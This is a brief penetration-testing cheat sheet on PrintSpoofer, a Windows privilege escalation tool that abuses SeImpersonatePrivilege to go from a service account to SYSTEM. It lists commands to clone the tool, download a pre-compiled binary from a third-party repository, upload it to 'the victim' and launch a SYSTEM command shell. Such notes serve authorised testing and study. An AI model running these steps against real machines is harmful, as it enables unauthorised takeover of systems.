PrintSpoofer

Windows privilege escalation technique. From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.

💡 Use this technique when winPEAS or “whoami /priv” says the the account has “SeImpersonatePrivilege”.

Download

See GitHub.

git clone https://github.com/itm4n/PrintSpoofer.git

❗ There is a problem with compilation of PrintSpoofer under Kali. Download the pre-compiled version.

wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe

Upload the file to the victim

Use Impacket. See File Transfer.

❗ EXE FILES MUST BE TRANSFERRED AS BINARY.

Execute PrintSpoofer

C:\<some path>\PrintSpoofer.exe -i -c cmd.exe